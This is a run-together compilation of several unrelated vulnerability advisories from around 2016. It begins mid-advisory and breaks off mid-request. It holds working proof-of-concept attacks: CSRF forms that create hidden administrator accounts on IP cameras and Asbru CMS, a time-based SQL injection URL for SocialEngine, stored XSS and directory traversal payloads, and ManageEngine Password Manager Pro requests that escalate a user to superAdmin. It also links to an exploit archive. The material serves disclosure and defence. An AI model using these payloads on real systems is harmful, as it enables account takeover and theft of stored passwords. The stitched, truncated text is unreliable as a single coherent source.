PoC
------
- This will create a admin credential: root:r00tx
<html>
<!-- CSRF PoC - -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
- ICA-5350V
<html>
<!-- CSRF PoC -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
- Del user root
<html>
<!-- CSRF PoC -->
<body>
<form action="http://
{xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp">
<input type="submit" value="Submit form" />
</form>
</body>
</html>
V. Cross-Site Scripting
=======================
Cams models ICA-* are prone to Multiple XSS
POC
-------
http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script>
this will pop-up the message XSS in the browser
VI. hardcoded credentials
=========================
The credentials of web management can be found just viewing the source of
page default_nets.htm:
POC
------
https://{xxx.xxx.xxx.xxx}/default_nets.htm
code:
}
function av_onload(){
CheckMobileMode();
util_SetUserInfo();
Loadplay();
watchdog();
//alert("watchdog");
}
function Loadplay(){
play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99","");
}
Vulnerable Packages
===================
ICA-2500
ICA-2250VT
ICA-4200V
ICA-4500V
ICA-3350V
ICA-5350V
ICA-8350
Timeline
========
2015-10-02 - Issues discovered
2015-11-30 - Vendor contacted (advisore sent)
2015-12-16 - Vendor contacted (asking for feedback about reported issues)
2015-12-17 - Vendor response (asking for more time to check issues)
2015-12-21 - RD team replied: can't duplicate vulnerabilities....
2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities
persist and can be reproduced.)
...and no news after that...
* CVE: CVE-2016-3943
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Endpoint Administration Agent < v7.50.00
* Fixed Version: Panda Endpoint Administration Agent v7.50.00
Description:
Panda Endpoint Administration Agent v7.30.2 allows a local attacker to elevate his privileges from any account type (Guest included) and execute code as SYSTEM, thus completely compromising the affected host.
Affected Products:
Any Panda Security For Business products for Windows using this Agent service are vulnerable.
Technical Details:
Upon installing some Panda Security for Business products for Windows, such as Panda Endpoint Protection/Plus, a service named as 'Panda Endpoint Administration Agent' is installed in the host. This service runs under the SYSTEM account. However, due to weak ACLs set to the installation directory ("C:\Program Files\Panda Security\WaAgent") of this application and its subdirectories, any user can modify or overwrite any executable module (dynamic link libraries and executables) installed in those directories.
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Disclosure Log:
Vendor Contacted: 12/01/2016
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher
* CVE: CVE-2015-7378
* Vendor: Panda Security
* Reported by: Kyriakos Economou
* Date of Release: 05/04/2016
* Affected Products: Multiple
* Affected Version: Panda Security URL Filtering < v4.3.1.9
* Fixed Version: Panda Security URL Filtering v4.3.1.9
Description:
All Panda Security 2016 Home User products for Windows are vulnerable to privilege escalation, which allows a local attacker to execute code as SYSTEM from any account (Guest included), thus completely compromising the affected host.
Affected Products:
Panda Gold Protection 2016 v16.0.1
Panda Global Protection 2016 v16.0.1
Panda Internet Security 2016 v16.0.1
Panda Antivirus Pro 2016 v16.0.1
Panda Free Antivirus v16.0.1
Impact:
A local attacker can elevate his privileges from any user account and execute code as SYSTEM.
Technical Details:
By default all the aforementioned products install (current version:4.3.0.4), which creates a service named 'panda_url_filtering' that runs as SYSTEM.
The executable modules are by default installed in "C:\ProgramData\Panda Security URL Filtering" directory.
However, the ACLs assigned to the directory itself, and to the rest of the installed files, allow any user to modify those files and/or substitute them with malicious ones.
A local attacker can easily execute code with SYSTEM account privileges by modifying or substituting the main executable module of this service, 'Panda_URL_Filteringb.exe', which will run at the next reboot of the host.
Disclosure Log:
Vendor Contacted: 28/09/2015
Public Disclosure: 05/04/2016
Copyright:
Copyright (c) Nettitude Limited 2016, All rights reserved worldwide.
Disclaimer:
The information herein contained may change without notice. Any use of this information is at the user's risk and discretion and is provided with no warranties. Nettitude and the author cannot be held liable for any impact resulting from the use of this information.
Kyriakos Economou
Vulnerability Researcher
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html
CVE-2016-3672 - Unlimiting the stack not longer disables ASLR
Authors: Hector Marco & Ismael Ripoll
CVE: CVE-2016-3672
Dates: April 2016
Description
We have fixed an old and very known weakness in the Linux ASLR implementation.
Any user able to running 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited.
Following are the steps to test whether your system is vulnerable or not:
1) Create a dummy program which shows its memory map:
#include <stdio.h>
int main(int argc, const char *argv[])
{
char cmd[256];
sprintf(cmd, "cat /proc/%d/maps", getpid());
system(cmd);
return 0;
}
2) Compile it:
$ gcc show_maps.c -o show_maps # In a i386 machine
$ gcc show_maps.c -o show_maps -m32 # In a 64-bit machine
3) Run the application to check that ASLR is working
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at random positions, so, the ASLR is working properly.
Now, we run the same test but setting the stack to unlimited:
$ ulimit -a | grep stack
stack size (kbytes, -s) 8192
$ ulimit -s unlimited
stack size (kbytes, -s) unlimited
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
The libc-2.19.so library is mapped at the same position in all executions: the ASLR has been disabled.
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.
Vulnerable packages
The weakness, IFAIK is present from the first version of current Linux GIT repository. The first version on this resposiroty is Linux-2.6.12-rc2 dated on April 2005.
Impact
An attacker capable of running 32-bit system applications in a x86 machine is able to disable the ASLR of any application, including sensitive applications such as setuid and setgid. Note that it is not a exploitable vulnerability by itself but a trick to disable the ASLR. This weakness can be use by an attacker when trying to exploit some other bug. Since the i386 is still very used, the number of systems and affected users could be extremely huge.
The wekaness
The issue arises because the ASLR Linux implementation does not randomize always the mmap base address when the stack size is set to unlimited. Concretely, on i386 and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized but not other mmapped files (libraries, vDSO, etc.). And depending in the Linux version, the executable is neither randomized.
The function to calculate the libraries position when the stack is set to unlimited is mmap_legacy_base():
static unsigned long mmap_legacy_base(void)
{
if (mmap_is_ia32())
return TASK_UNMAPPED_BASE;
else
return TASK_UNMAPPED_BASE + mmap_rnd();
}
The function doesn't add any random offset when the system is running in a native 32-bit system (i386) or a 32-bit emulated system (x86_32).
Exploit
To exploit this weakness, the attacker just need to set to unlimited the stack and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid.
FIX
We have created a patch to fix this issue:
diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
index 96bd1e2..389939f 100644
--- a/arch/x86/mm/mmap.c
+++ b/arch/x86/mm/mmap.c
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
}
/*
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
- * does, but not when emulating X86_32
- */
-static unsigned long mmap_legacy_base(unsigned long rnd)
-{
- if (mmap_is_ia32())
- return TASK_UNMAPPED_BASE;
- else
- return TASK_UNMAPPED_BASE + rnd;
-}
-
-/*
* This function, called very early during the creation of a new
* process VM image, sets up which VM layout function to use:
*/
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
if (current->flags & PF_RANDOMIZE)
random_factor = arch_mmap_rnd();
- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
if (mmap_is_legacy()) {
mm->mmap_base = mm->mmap_legacy_base;
The patch enables randomization for the libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. We already sent the patch to Linux mantainers and the issue will be not problem in incomming Linux versions: Enable full randomization on i386 and X86_32
Discussion
Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch.
Hector Marco - http://hmarco.org
Advisory ID: HTB23286
Product: SocialEngine
Vendor: Webligo
Vulnerable Version(s): 4.8.9 and probably prior
Tested Version: 4.8.9
Advisory Publication: December 21, 2015 [without technical details]
Vendor Notification: December 21, 2015
Public Disclosure: April 6, 2016
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: High
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website.
The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database.
A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5":
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
-----------------------------------------------------------------------------------------------
Solution:
Update to SocialEngine 4.8.10
More Information:
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7
Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
Tested on : Apache Tomcat/5.5.23
Apache/2.2.3 (CentOS)
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
09.03.2016
--
#1
Directory Traversal:
--------------------
http://10.0.0.7/../../../../../WEB-INF/web.xml
#2
Open Redirect:
--------------
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------
<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
[Systems Affected]
Product : ManageEngine Password Manager Pro
Company : ZOHO Corp.
Build Number : 8.1 to 8.3 and probably earlier versions
Affected Versions : 8102 to 8302 and probably earlier versions
[Product Description]
Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.
[Vulnerabilities]
Multiple vulnerabilities were identified within this application:
1- Stored XSS in /AddMail.ve
2- Privilege escalation in /EditUser.do
3- Business Login Bypass in /EditUser.do
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
7- Password Bruteforce for resources accounts in
/jsp/xmlhttp/AjaxResponse.jsp
8- Cross-Site Request Forgery
[Advisory Timeline]
17/07/2015 - Discovery and vendor notification
17/07/2015 - ManageEngine responsed that they will notify their
development team
13/10/2015 - ManageEngine informed that they have fixed these issue
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
15/10/2015 - Test on Beta build version 8300 was performed and
confirm the fix of these issues 2, 4, 7 and part of issue 8
02/11/2015 - ManageEngine ask more time to fix the remaining issues
before making this public
29/12/2015 - ManageEngine contacted for an update - No reply
12/01/2016 - ManageEngine contacted for an update - No reply
08/02/2016 - ManageEngine contacted for an update - small update provided
12/02/2016 - Last communication from ManageEngine
04/04/2016 - Public Disclosure
[Patch Available]
Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
fix issues #2, #4, #7 and partially #8
Password Manager Pro Release 8.3 (8303) (Released on December 2015)
fix issues #1, #3, #5 and #6
[Exploit]
There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2) and elevates a regular user to
SuperAdmin, and then downloads the passwords and files stored within
the application. The exploit code is available here
- https://github.com/s3bap3/pmp-exploit
[Description of Vulnerabilities]
(1) Stored XSS in /AddMail.ve.
This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an html
form can be forged to create a personal account an exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this
[PoC]
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
(2) Privilege escalation in /EditUser.do that allows to do 2 things.
a- Hijack user's sessions by changing their emails and accessing
the forgot password functionality.
The affected parameter is "EMAIL" from the /EditUser.do web page.
Any user (even PASSWORD USER's role) could send a craft POST method
like the one below in order to change the user email address, which is
being used to generate a new user password when the previous one was
forgotten. The only attribute that needs to be changed from one
request to another is the LOGINID, which is a sequence number that
represent the User numeric ID.
b- Escalate privileges by changing the user account status from
Password user to superadmin.
By forging a similar request it is possible to raise our own
privileged to become a privileged user. For example, the parameter
"ROLE" can be changed to "Password Auditor" "Password Administrator"
or even "Administrator " and become it. It is also possible to become
a superAdmin by changing the parameter "superAdmin" from false to
true. This will allow us to take control of the application and all
the passwords stored on it. In order to become superAdmin, the user
role needs to be Administrator. Both can be achieved by forging the
same request. In this scenario there are two parameters to be aware
of.
- USERID and LOGINID is the numeric account id to which the
superadmin attribute will be granted (could be obtained from the login
reply)
- USER is the username to which the superadmin attribute will be granted
[PoC]
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------20780287114832
-----------------------------20780287114832
Content-Disposition: form-data; name="isloginusersa"
false
-----------------------------20780287114832
Content-Disposition: form-data; name="superadminscope"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="SERVERPORT"
7272
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="USERID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="LOGINID"
4
